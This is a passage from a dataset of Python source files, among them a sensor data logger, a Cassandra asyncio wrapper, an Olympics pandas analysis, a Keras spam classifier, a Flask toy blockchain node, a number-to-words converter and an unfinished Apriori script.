iMet sensor into a file called IMETDATAXX.CSV.\n#\t\t\tIf the program detects that an ADC has been attached, the program\n#\t\t\twill send ADC data, immediately followed by iMet data through the\n#\t\t\tserial port. This is intended to be used with an xBee in coordination\n#\t\t\twith a ground station computer. The ground station computer will be \n#\t\t\tset up to display a live graph of the data.\n\n#NOTE: all xbee communication lines have been commented out for the time being (serial initialization and a single write inside the while loop\n#\t\t\t\t\t\t\t\t\t\tThis was done on 6/7/21 for testing purposes)\n\nimport os\nimport time\nimport serial\nimport sys\nfrom gpiozero import LED, Button\n\n#check if Arduino ADC is connected via USB\n#if not used, program continues with only iMET recording\ntry:\n ser_ADC = serial.Serial(\n port='/dev/ARD',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=2\n )\n use_ADC = 1\nexcept: #error if no adc attached.\n print(\"No ADC attached. Not using.\\n\")\n use_ADC = 0\n\n \n#ser_xBee = serial.Serial(\n# port='/dev/ttyS0',\n# baudrate = 9600,\n# parity=serial.PARITY_NONE,\n# stopbits=serial.STOPBITS_ONE,\n# bytesize=serial.EIGHTBITS,\n# timeout=1\n#)\n\n#check if iMet attached\ntry:\n ser_iMET = serial.Serial(\n port='/dev/ttyUSB1',\n baudrate = 57600, \n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n\t)\nexcept:\n print(\"no iMET attached, cannot continue. \\n\")\n exit()\n\ntry:\n collect_ADC = LED(27)\n stop_button = Button(25, pull_up=False) #TODO: was 25, changed to 13/17\n\n counter=0#potentially unneccessary\n\n#open iMET file\n#first get filename\n config = \"/home/pi/BC6B/CONFIG\"\n location = sys.argv[1]\n init_iMET_filename = \"IMETDATA\"\n for i in range(100):\n j = i-1\n to_append = str(j)+\".CSV\" #TODO was i\n config_to_append = str(i) + \".YML\"\n true_config = config + config_to_append\n iMET_appended = location + init_iMET_filename + to_append\n file_exists = os.path.isfile(true_config)\n if file_exists == 0: #if file doesn't exist exit loop and create it\n\t\t\t #file is created in the following while loop\n print(\"file created\")\n break\n\n print(\"launching while loop \\n\")\n \n temp = 1\n while(True):\n if use_ADC == 1:\n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n collect_ADC.on() #tell arduino to grab data\n collect_ADC.off()\n data_ADC = ser_ADC.readline().decode()\n\t #data_all = data_ADC + data_iMET\n #ser_xBee.write(data_all)\n iMET_file.write(data_iMET)\n iMET_file.write(\"\\n\")\n iMET_file.close()\n\t\t\n else:\n \n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n iMET_file.write(data_iMET)\n print(data_iMET) #TODO\n iMET_file.write(\"\\n\")\n iMET_file.close()\n time.sleep(1)\n \n#stop_button.wait_for_press()\n#print(\"aye bro the button was pressed\")\n \"\"\"\n time.sleep(1)\n for x in range (10):\n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n print(data_iMET)\n iMET_file.write(data_iMET)\n iMET_file.write(\"\\n\")\n iMET_file.close()\n \n\n print(\"done\\n\")\n \"\"\"\nexcept:\n print(\"exception thrown\")\n if not iMET_file.closed:\n iMET_file.close()\n\t\t\n\t\t\n","sub_path":"iMET_sampling.py","file_name":"iMET_sampling.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7330001","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport sys\nfrom functools import partial\n\nfrom cassandra.cluster import Session\n\nfrom types import MethodType # isort:skip\n\ntry:\n import asyncio\nexcept ImportError:\n import trollius as asyncio\n\n__version__ = '1.0.4'\n\n\ndef _asyncio_fut_factory(loop):\n try:\n return loop.create_future\n except AttributeError:\n return partial(asyncio.Future, loop=loop)\n\n\ndef _asyncio_result(self, fut, result):\n self._loop.call_soon_threadsafe(fut.set_result, result)\n\n\ndef _asyncio_exception(self, fut, exc):\n self._loop.call_soon_threadsafe(fut.set_exception, exc)\n\n\ndef execute_future(self, *args, **kwargs):\n cassandra_fut = self.execute_async(*args, **kwargs)\n\n asyncio_fut = self._asyncio_fut_factory()\n\n cassandra_fut.add_callbacks(\n partial(self._asyncio_result, asyncio_fut),\n partial(self._asyncio_exception, asyncio_fut),\n )\n\n return asyncio_fut\n\n\ndef aiosession(session, loop=None):\n assert isinstance(session, Session), 'provide cassandra.cluster.Session'\n\n if hasattr(session, '_asyncio_fut_factory'):\n raise RuntimeError('session is already patched by aiosession')\n\n if loop is None:\n loop = asyncio.get_event_loop()\n\n setattr(session, '_loop', loop)\n setattr(session, '_asyncio_fut_factory', _asyncio_fut_factory(loop=loop))\n\n if sys.version_info >= (3, 0):\n session._asyncio_result = MethodType(_asyncio_result, session)\n session._asyncio_exception = MethodType(_asyncio_exception, session)\n session.execute_future = MethodType(execute_future, session)\n else:\n session._asyncio_result = MethodType(_asyncio_result, session, Session)\n session._asyncio_exception = MethodType(_asyncio_exception, session, Session) # noqa\n session.execute_future = MethodType(execute_future, session, Session)\n\n return session\n","sub_path":"aiocassandra.py","file_name":"aiocassandra.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332215305","text":"#Programa para calcular la serie n veces del numero 3\n#Lenguaje python version 3.6\n\nn = int (input('Introduzca numero: '))\nm = 3\nfor i in range(1,n+1):\n # print('Valor ',i,' de la Serie: ',m)\n #La siguiente sentencia imprime una linea horizontal\n print(m,end=', ')\n m= m + 3\n\n#Fin de archivo\n#***************************************************************************","sub_path":"serie_ciclo1.py","file_name":"serie_ciclo1.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"526224134","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Path of the file\r\npath \r\ndata = pd.read_csv(path)\r\n\r\ndata.rename(columns = {'Total':'Total_Medals'} , inplace = True)\r\n\r\nprint(data.head(10))\r\n\r\n#Code starts here\r\n\n\n\n# --------------\n#Code starts here\r\n\r\ndata['Better_Event'] = np.where(data['Total_Summer']>data['Total_Winter'] ,'Summer','Winter')\r\n\r\ndata['Better_Event'] =np.where(data['Total_Summer'] ==data['Total_Winter'],'Both',data['Better_Event'])\r\n\r\nprint(data['Better_Event'])\r\n\r\nbetter_event = data['Better_Event'].value_counts().idxmax()\r\n\r\nprint(better_event)\n\n\n# --------------\n#Code starts here\r\n#print(data)\r\ntop_countries = data[['Country_Name','Total_Summer', 'Total_Winter','Total_Medals']]\r\n\r\n#print(top_countries)\r\n\r\ntop_countries.drop(top_countries.index[146], inplace = True)\r\nprint(top_countries)\r\n\r\ndef top_ten(top_countries, column_name):\r\n country_list = []\r\n top_countries = top_countries.nlargest(10,column_name)\r\n country_list = list(top_countries['Country_Name'])\r\n return country_list\r\n\r\ntop_10_summer = top_ten(top_countries,'Total_Summer')\r\ntop_10_winter = top_ten(top_countries,'Total_Winter')\r\ntop_10 = top_ten(top_countries,'Total_Medals')\r\n\r\ncommon = list(set(top_10_summer) & set(top_10_winter) & set(top_10))\r\nprint(common)\r\n\r\n\r\n\r\nprint(top_10_summer,top_10_winter,top_10)\n\n\n# --------------\n#Code starts here\r\n\r\nsummer_df = data[data['Country_Name'].isin(top_10_summer)]\r\n\r\n#print(summer_df)\r\n\r\nwinter_df = data[data['Country_Name'].isin(top_10_winter)]\r\n\r\n#print(winter_df)\r\n\r\ntop_df = data[data['Country_Name'].isin(top_10)]\r\nprint(top_df)\r\n\r\nplt.plot(data['Country_Name'] , data['Total_Summer'] , label = 'line 1')\r\nplt.plot(data['Country_Name'] , data['Total_Winter'],label = 'line 2')\r\nplt.plot(data['Country_Name'] , data['Total_Medals'],label = 'line 3')\n\n\n# --------------\n#Code starts here\r\n\r\n#summer_df['Golden_Ratio'] = round(summer_df['Gold_Summer']/summer_df['Total_Summer'], 2)\r\n\r\n#print(summer_df['Golden_Ratio'], summer_df)\r\n\r\n#summer_max_ratio = summer_df['Golden_Ratio'].idxmax()\r\n#summer_country_gold = summer_df.loc[23,'Country_Name']\r\n\r\n#print(summer_max_ratio, summer_country_gold)\r\n\r\nsummer_df['Golden_Ratio']=summer_df['Gold_Summer']/summer_df['Total_Summer'] \r\n\r\nsummer_max_ratio=max(summer_df['Golden_Ratio']) \r\nsummer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(summer_max_ratio, summer_country_gold)\r\n\r\n\r\nwinter_df['Golden_Ratio']=winter_df['Gold_Winter']/winter_df['Total_Winter'] \r\n\r\nwinter_max_ratio=max(winter_df['Golden_Ratio']) \r\nwinter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(winter_max_ratio, winter_country_gold)\r\n\r\n\r\n\r\ntop_df['Golden_Ratio']=top_df['Gold_Total']/top_df['Total_Medals'] \r\n\r\ntop_max_ratio=max(top_df['Golden_Ratio']) \r\ntop_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(top_max_ratio, top_country_gold)\r\n\r\n\r\n\n\n\n# --------------\n#Code starts here\r\ndata_1 = data.drop(data.index[len(data)-1])\r\n\r\ndata_1['Total_Points'] = 3*data_1['Gold_Total'] + 2*data_1['Silver_Total']+ 1*data_1['Bronze_Total']\r\n\r\n\r\nmost_points=max(data_1['Total_Points']) \r\nbest_country=data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name']\r\n\r\nprint(most_points,best_country)\n\n\n# --------------\n#Code starts here\r\n\r\nbest = data[data['Country_Name'] == best_country]\r\n\r\n\r\nbest =best[['Gold_Total','Silver_Total', 'Bronze_Total']]\r\nprint(type(best))\r\n\r\nbest.plot(kind = 'bar')\r\n\r\nplt.xlabel(\"United States\")\r\nplt.ylabel(\"Medals Tally\")\r\nplt.xticks(rotation = 45)\n\n\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202037513","text":"from django.conf.urls import url, include\n\nfrom apps.login.views import login, contentuser, contentuseruser\n\nurlpatterns = [\n #url(r'^qa', chamgePercemtage, name='chamgepercemtage'),\n url(r'^$', login, name='login'),\n url(r'^contentuser/memdex.html', contentuser, name='contentuser'), # For mentor\n url(r'^contentuser/userimdex.html', contentuseruser, name='contentuseruser'), #For Student\n \n #url(r'^contentuser/', include('apps.contentuser.urls'), name='login'),\n #url(r'^$', contentuser, name='contentuser'),\n]\n","sub_path":"hbpro/apps/login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"545576417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Exercice 1 : Construction d'une pile de longueur finie\n# ======================================================\ndef creer_pile(n):\n return n*[None]\n \ndef est_vide(pile):\n for el in pile :\n if el != None :\n return False\n return True\n\ndef est_pleine(pile):\n return (not None in pile) \n\ndef empiler(pile,el):\n if est_pleine(pile):\n return None\n # On recherche le premier emplacement vide\n i=0\n while pile[i]!= None:\n i=i+1\n pile[i]=el\n\ndef depiler(pile):\n if est_vide(pile):\n return None\n # On recherche le premier emplacement vide\n if est_pleine(pile):\n l = len(pile)\n el = pile[l-1]\n pile[l-1]=None\n return el\n i=0\n while pile[i]!= None:\n i=i+1\n el = pile[i-1]\n pile[i-1]=None\n return el \n \ndef taille_pile(pile):\n return len(pile)\n# Exercice 2 : NPI\n# ================\ndef est_nombre(el):\n return type(el)==float or type(el)==int\n\ndef est_operation(el):\n return el in [\"+\",\"-\",\"*\",\"/\"]\n \ndef inverse(pile):\n pile2=creer_pile(taille_pile(pile))\n pile3=creer_pile(taille_pile(pile))\n while not (est_vide(pile)):\n empiler(pile2,depiler(pile))\n while not (est_vide(pile2)):\n empiler(pile3,depiler(pile2))\n while not (est_vide(pile3)):\n empiler(pile,depiler(pile3))\n\ndef operer(nb1,nb2,op):\n if op == \"+\":\n return nb1+nb2\n elif op == \"*\":\n return nb1*nb2\n \ndef evaluer(pile):\n inverse(pile)\n pile2=creer_pile(taille_pile(pile))\n while not est_vide(pile):\n el = depiler(pile)\n if est_nombre(el):\n empiler(pile2,el)\n elif est_operation(el) :\n empiler(pile2,operer(depiler(pile2),depiler(pile2),el))\n return depiler(pile2)\n \n \n \npile1=[1,2,\"+\",4,\"*\",3,\"+\"]\npile2=[1,2,\"+\",4,\"*\",-3,\"+\",5,\"+\"]\nprint(evaluer(pile2))","sub_path":"P_05_AlgorithmiqueProgrammation/02_Piles/TD_02/programmes/TD_02_XP.py","file_name":"TD_02_XP.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604033040","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport random\nimport string\nimport numpy as np\nimport os\n\ncheckpoint_path = \"training_1/cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\n\ncp_callback = tf.keras.callbacks.ModelCheckpoint(checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\nletter_index = {}\nhm_lines = 10000000\n\ndef generate_spam():\n dict = get_letter_dict_reversed()\n with open(\"Spam.txt\", \"w\") as text_file:\n #10000 lines of spam\n for i in range(10000):\n line = \"\"\n for j in range(random.randint(1,256)):\n line += dict[random.randint(0,len(dict)-1)]\n text_file.write(line +'\\n')\n\ndef get_letter_dict():\n array_of_content = []\n with open('ascii.txt','r') as f:\n temp_array_of_content = [line.splitlines() for line in f]\n char_array = []\n index_array = []\n rows = len(temp_array_of_content)\n\n for i in range(rows):\n broken_line = list(temp_array_of_content[i][0])\n ascii_char = broken_line[len(broken_line)-1]\n char_array.append(ascii_char)\n current_index = \"\"\n\n for j in range(len(broken_line)-2):\n current_index += broken_line[j]\n index_array.append(current_index)\n\n dictOfWords = { char_array[k] : k for k in range(0, len(char_array) ) }\n\n return dictOfWords\n\ndef get_letter_dict_reversed():\n letter_index_temp = get_letter_dict()\n reverse_letter_index = dict([(value, key) for (key, value) in letter_index_temp.items()])\n return reverse_letter_index\n\ndef get_letter_dict_with_reserved():\n letter_index = get_letter_dict()\n letter_index = {k:(v+4) for k,v in letter_index.items()}\n letter_index[\"\"] = 0\n letter_index[\"\"] = 1\n letter_index[\"\"] = 2 # unknown\n letter_index[\"\"] = 3\n return letter_index\n\ndef get_letter_dict_with_reserved_reversed():\n letter_index_temp = get_letter_dict_with_reserved()\n reverse_letter_index = dict([(value, key) for (key, value) in letter_index_temp.items()])\n return reverse_letter_index\n\nreverse_letter_index = get_letter_dict_with_reserved_reversed()\nletter_index = get_letter_dict_with_reserved()\n\ndef decode(text):\n return ''.join([reverse_letter_index.get(i, 2) for i in text])\n\ndef encode(text):\n chars = list(text)\n return ([letter_index.get(i, 2) for i in chars])\n\ndef encode_contents(not_spam, spam):\n contents_of_file_encoded = []\n with open(not_spam,'r') as f:\n contents_of_file = [line.splitlines() for line in f]\n for i in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[i][0]))\n\n with open(spam,'r') as g:\n contents_of_file = [line.splitlines() for line in g]\n for j in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[j][0]))\n\n return contents_of_file_encoded\n\ndef encode_contents_single(file):\n contents_of_file_encoded = []\n with open(file,'r') as f:\n contents_of_file = [line.splitlines() for line in f]\n for i in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[i][0]))\n return contents_of_file_encoded\n\ndef suffle_contents(spam_and_not, file1, file2):\n not_spam = encode_contents_single(file1)\n spam = encode_contents_single(file2)\n total_file_data = []\n for i in range(len(not_spam)):\n total_file_data.append(1)\n for j in range(len(spam)):\n total_file_data.append(0)\n\n test = (spam_and_not)\n rng_state = np.random.get_state()\n np.random.shuffle(test)\n np.random.set_state(rng_state)\n np.random.shuffle(total_file_data)\n\n return test, total_file_data\n\n\n\ndef create_test_data_and_labels():\n file_contents_encoded = encode_contents(\"NotSpam.txt\", \"Spam.txt\")\n\n data, labels = suffle_contents(file_contents_encoded, \"NotSpam.txt\", \"Spam.txt\")\n\n train_data_pre = data[:len(data)//2]\n test_data_pre = data[len(data)//2:]\n train_data = np.array(train_data_pre)\n test_data = np.array(test_data_pre)\n\n train_labels_pre = labels[:len(labels)//2]\n test_labels_pre = labels[len(labels)//2:]\n train_labels = np.array(train_labels_pre)\n test_labels = np.array(test_labels_pre)\n\n\n train_data = keras.preprocessing.sequence.pad_sequences(train_data,\n value=letter_index[\"\"],\n padding='post',\n maxlen=256)\n test_data = keras.preprocessing.sequence.pad_sequences(test_data,\n value=letter_index[\"\"],\n padding='post',\n maxlen=256)\n\n return train_data, test_data, train_labels, test_labels\n\n\ndef build_model():\n train_data, test_data, train_labels, test_labels = create_test_data_and_labels()\n vocab_size = len(get_letter_dict_with_reserved())\n\n model = tf.keras.models.Sequential([\n keras.layers.Embedding(vocab_size, 16),\n keras.layers.GlobalAveragePooling1D(),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['acc'])\n x_val = train_data[:10000]\n partial_x_train = train_data[10000:]\n\n y_val = train_labels[:10000]\n partial_y_train = train_labels[10000:]\n\n history = model.fit(partial_x_train,\n partial_y_train,\n epochs=40,\n batch_size=512,\n validation_data=(x_val, y_val),\n verbose=1,\n )\n\n results = model.evaluate(test_data, test_labels)\n\n model.fit(train_data, train_labels, epochs = 2,\n validation_data = (test_data,test_labels),\n callbacks = [cp_callback]) # pass callback to training\n\n print(results)\n return model\n\ndef create_default_model():\n vocab_size = len(get_letter_dict_with_reserved())\n model = tf.keras.models.Sequential([\n keras.layers.Embedding(vocab_size, 16),\n keras.layers.GlobalAveragePooling1D(),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['acc'])\n\n return model\n\ndef create_restored_model():\n train_data, test_data, train_labels, test_labels = create_test_data_and_labels()\n restore_model = create_default_model()\n restore_model.load_weights(checkpoint_path)\n loss,acc = restore_model.evaluate(test_data, test_labels)\n print(\"Restored model, accuracy: {:5.2f}%\".format(100*acc))\n return restore_model\n\ndef test_data_msg(message):\n #restore_model = create_restored_model()\n pre = np.array(encode(message))\n prediction = restore_model.predict(pre)\n\n decision = [\"Spam\", \"Not Spam\"]\n return decision[int(prediction[0][0])]\n\ndef train_model():\n model = build_model()\n\n#train_model()\nrestore_model = create_restored_model()\n#model.summary()\n\nprint(test_data_msg(\"!levels\"))\n","sub_path":"SpamClassification/spam_classification_ASCII.py","file_name":"spam_classification_ASCII.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243676448","text":"\nimport datetime\nfrom flask import Flask, jsonify, request\nimport hashlib\nimport json\nimport requests\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\n# 1. create blockchain class\n\n\nclass Blockchain():\n def __init__(self):\n self.chain = []\n self.transactions = []\n self.create_block(prev_hash='0', proof=1)\n self.nodes = set()\n\n def create_block(self, prev_hash, proof):\n block = {'timestamp': str(datetime.datetime.now()),\n 'prev_hash': prev_hash,\n 'proof': proof,\n 'index': len(self.chain)+1,\n 'transactions': self.transactions}\n self.transactions = []\n self.chain.append(block)\n return block\n\n def get_prev_block(self):\n return self.chain[-1]\n\n def get_proof(self, prev_proof):\n #prev_proof = self.get_prev_block['proof']\n found = False\n proof = 1\n while(not found):\n # any non symmetric function with fair enough complexity\n hash_found = hashlib.sha256(\n str(proof**2-prev_proof**2).encode()).hexdigest()\n if(hash_found[:4] == '0000'):\n found = True\n else:\n proof = proof+1\n return proof\n\n def hash(self, block):\n # convert to json and sort to keys to get uniform hashing\n encoded_block = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(encoded_block).hexdigest()\n\n def sanity_check(self):\n # 2 checks needed\n # 1. prev hash matches with current hash stored\n prev = self.chain[0]\n index = 1\n while(index < len(self.chain)):\n prev_hash = self.chain[index]['prev_hash']\n if(prev_hash != self.hash(prev)):\n return False\n # 2. proof of work is correct\n proof = self.chain[index]['proof']\n prev_proof = prev['proof']\n hash_found = hashlib.sha256(\n str(proof**2-prev_proof**2).encode()).hexdigest()\n if(hash_found[:4] != '0000'):\n found = False\n prev = self.chain[index]\n index += 1\n return True\n # transactions to make it cryptocurrency\n\n def add_transaction(self, amount, sender, receiver):\n self.transactions.append(\n {'sender': sender, 'receiver': receiver, 'amount': amount})\n prev_block = self.get_prev_block()\n return prev_block['index']+1\n\n def add_node(self, address):\n parsed_url = urlparse(address)\n self.nodes.add(parsed_url.netloc)\n # consesus to make all nodes have same chain\n\n def replace_nodes(self):\n network = self.nodes\n longest_chain = None\n max_len = len(self.chain)\n for node in network:\n response = requests.get(f'http://{node}/list_chain')\n if response.status_code == 200:\n length = response.json()['length']\n chain = response.json()['chain']\n if length > max_len and self.sanity_check():\n max_len = length\n longest_chain = chain\n if longest_chain:\n self.chain = longest_chain\n return True\n return False\n\n\n# 2. Actual working and mining\nblockchain = Blockchain()\n# Webapp\napp = Flask(__name__)\n# Create node addresses\nnode_addresses = str(uuid4()).replace('-', '')\n\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n prev_block = blockchain.get_prev_block()\n proof = blockchain.get_proof(prev_block['proof'])\n block = blockchain.create_block(blockchain.hash(prev_block), proof)\n blockchain.add_transaction(\n sender=node_addresses, receiver='Alfred', amount=10)\n response = {'message': ' You did it! New block created',\n 'index': block['index'], 'timestamp': block['timestamp'], 'proof': block['proof'], 'prev_hash': block['prev_hash'], 'transactions': block['transactions']}\n return jsonify(response), 200\n\n\n@app.route('/list_chain', methods=['GET'])\ndef list_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return jsonify(response), 200\n\n\n@app.route('/sanity', methods=['GET'])\ndef sanity():\n valid = blockchain.sanity_check()\n if(valid):\n response = {'message': 'Blockchain is valid'}\n else:\n response = {'message': 'Sorry. Something went wrong!'}\n return jsonify(response), 200\n\n\n@app.route('/add_transaction', methods=['POST'])\ndef add_transaction():\n json = request.get_json()\n transaction_keys = {'sender', 'receiver', 'amount'}\n if not all(key in json for key in transaction_keys):\n return 'Missing keys', 400\n index = blockchain.add_transaction(\n json['sender'], json['receiver'], json['amount'])\n response = {'message': f'Transaction will be added to {index}'}\n return response, 201\n# 3. decentralizing blockchain\n\n# Create new nodes\n\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json = request.get_json()\n nodes = json.get('nodes')\n if nodes is None:\n return 'No node found', 400\n for node in nodes:\n blockchain.add_node(node)\n response = {'message': 'All nodes added successfully. Chain contains following nodes',\n 'total_nodes': list(blockchain.nodes)}\n return jsonify(response), 201\n\n# Replace all chains with most recent one\n\n\n@app.route('/update_chain', methods=['GET'])\ndef update_chain():\n is_chain_replaced = blockchain.replace_nodes()\n if(is_chain_replaced):\n response = {\n 'message': 'Nodes had different chians. Hence, Chain is replaced', 'new_chain': blockchain.chain}\n else:\n response = {'message': 'Chain is already updated',\n 'actual_chain': blockchain.chain}\n return jsonify(response), 200\n\n\napp.run(host='0.0.0.0', port=5002)\n","sub_path":"crypcoin_node_5002.py","file_name":"crypcoin_node_5002.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323866259","text":"from SpellCheckerTrainer import SpellCheckerTrainer\nimport sys\n\n\ncorpus = sys.argv[1]\nmodel = sys.argv[2]\nif len(sys.argv) == 5:\n algorithm = sys.argv[3]\n iterations = int(sys.argv[4])\nelse:\n algorithm = 'GIS'\n iterations = 30\n\nspt = SpellCheckerTrainer()\nspt.trainingClassifiers(corpus, model, algorithm, iterations)\n\n","sub_path":"TrainSpellCheck.py","file_name":"TrainSpellCheck.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245741079","text":"def reg_test(reg, test_str):\n import re\n test_str_2 = \"'a25-49 (nbcu)'\"\n\n matches = re.finditer(reg, test_str, re.MULTILINE)\n\n for matchNum, match in enumerate(matches, start=1):\n\n print(\"Match {matchNum} was found at {start}-{end}: {match}\".format(matchNum=matchNum, start=match.start(),\n end=match.end(), match=match.group()))\n\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1\n\n print(\"Group {groupNum} found at {start}-{end}: {group}\".format(groupNum=groupNum,\n start=match.start(groupNum),\n end=match.end(groupNum),\n group=match.group(groupNum)))\n\n","sub_path":"Classifier/tests/regex_string_test.py","file_name":"regex_string_test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624112132","text":"from re import split\n\n__SIGNS = {\n '-': 'minus', '+': 'plus', '*': 'times by',\n '/': 'divided by', '=': 'equals', '=-': 'equals minus'\n}\n__ONES = {\n '1': 'one', '2': 'two', '3': 'three', '4': 'four', '5': 'five',\n '6': 'six', '7': 'seven', '8': 'eight', '9': 'nine'\n}\n__TEENS = {\n '0': 'ten', '1': 'eleven', '2': 'twelve', '3': 'thirteen', '4': 'fourteen',\n '5': 'fifteen', '6': 'sixteen', '7': 'seventeen', '8': 'eighteen', '9': 'nineteen'\n}\n__TENS = {\n '2': 'twenty', '3': 'thirty', '4': 'forty', '5': 'fifty',\n '6': 'sixty', '7': 'seventy', '8': 'eighty', '9': 'ninety'\n}\n__HIGHER_POSITIONS = ['thousand', 'million', 'billion', 'trillion', 'quadrillion']\n\n\ndef humanize(expression):\n lexemes = parse(expression)\n if lexemes is None:\n return 'invalid input'\n return ' '.join(\n __SIGNS[lex] if lex in __SIGNS else interpret(lex) for lex in lexemes\n )\n\n\ndef parse(expression):\n if expression == '':\n return None\n lexemes = __split(expression)\n if lexemes[0] in __SIGNS:\n if not __check_from_start(lexemes):\n return None\n elif isnum(lexemes[0]):\n if not __check_signs(lexemes, 1):\n return None\n else:\n return None\n return lexemes\n\n\ndef __split(expression):\n return [lex for lex in split(\n r'(-|\\+|\\*|/|=-|=)', expression.replace(' ', '')\n ) if lex != '']\n\n\ndef isnum(lex):\n isdigit = lex.isdigit()\n return isdigit if len(lex) <= 1 else isdigit and lex[0] != '0'\n\n\ndef __check_from_start(lexemes):\n return len(lexemes) >= 2 and lexemes[0] == '-' and isnum(lexemes[1]) \\\n and lexemes[1] != '0' and __check_signs(lexemes, 2)\n\n\ndef __check_signs(lexemes, start):\n length = len(lexemes)\n for i in range(start, length, 2):\n if i + 1 == length or not isnum(lexemes[i + 1]) or \\\n lexemes[i] == '=-' and lexemes[i + 1] == '0':\n return False\n return True\n\n\ndef interpret(lexeme):\n if lexeme == '0':\n return 'zero'\n digits, trinities, length = lexeme[::-1], [], len(lexeme)\n for ones in range(0, length, 3):\n trinity, hundreds, tens = [], ones + 2, ones + 1\n if hundreds < length and digits[hundreds] != '0':\n trinity.append(f'{__ONES[digits[hundreds]]} hundred')\n if tens < length and int(digits[tens]) > 1:\n trinity.append(__TENS[digits[tens]])\n flag = tens < length and digits[tens] == '1'\n if not flag and digits[ones] != '0':\n trinity.append(__ONES[digits[ones]])\n if flag:\n trinity.append(__TEENS[digits[ones]])\n if len(trinity) > 0:\n if ones != 0:\n trinity.append(__HIGHER_POSITIONS[ones // 3 - 1])\n trinities.append(trinity)\n return ' '.join(pos for trin in trinities[::-1] for pos in trin)\n","sub_path":"humanizer.py","file_name":"humanizer.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616318668","text":"import sys\nimport csv\nimport time\n\ndataset=sys.argv[1]\nmin_support=float(sys.argv[2])\nmin_confidence=float(sys.argv[3])\ntransactions=[]\nno_of_transactions=0\nitemset=[]\nitemset_support={}\nitemset_count={}\nfrequent_1itemset=[]\nitemset2=[]\nitemset2_support={}\nitemset2_count={}\nitemset2_confidence={}\nfrequent_2itemset=[]\nitemset3=[]\nitemset3_count={}\nitemset3_support={}\nitemset3_confidence={}\nfrequent_3itemset=[]\nrules=[]\ndef read_transactions():\n\twith open(dataset, newline='') as csvfile:\n spamreader = csv.reader(csvfile)\n '''for row in spamreader:\n transaction_row=[]\n for i in row:\n item=int(i)\n if item not in itemset:\n itemset.append(item)\n itemset_count[item]=1\n else:\n itemset_count[item]+=1\n transaction_row.append(item)\n transactions.append(transaction_row)'''\n for row in spamreader:\n transactions.append(row[:])\n\ndef generate_1itemset():\n for row in transactions:\n for item in row:\n if item not in itemset:\n itemset.append(item)\n itemset_count[item]=1\n else:\n itemset_count[item]+=1\n itemset.sort()\n for item in itemset:\n itemset_support[item]=float(itemset_count[item]/no_of_transaction)\n for item in itemset:\n if itemset_support[item] >= min_support:\n frequent_1itemset.append(item)\n\ndef generate_2itemset():\n\n\tfor item1 in frequent_1itemset:\n\t\tfor item2 in frequent_1itemset:\n\t\t\tif not item1==item2:\n\t\t\t\tif [item2,item1] not in 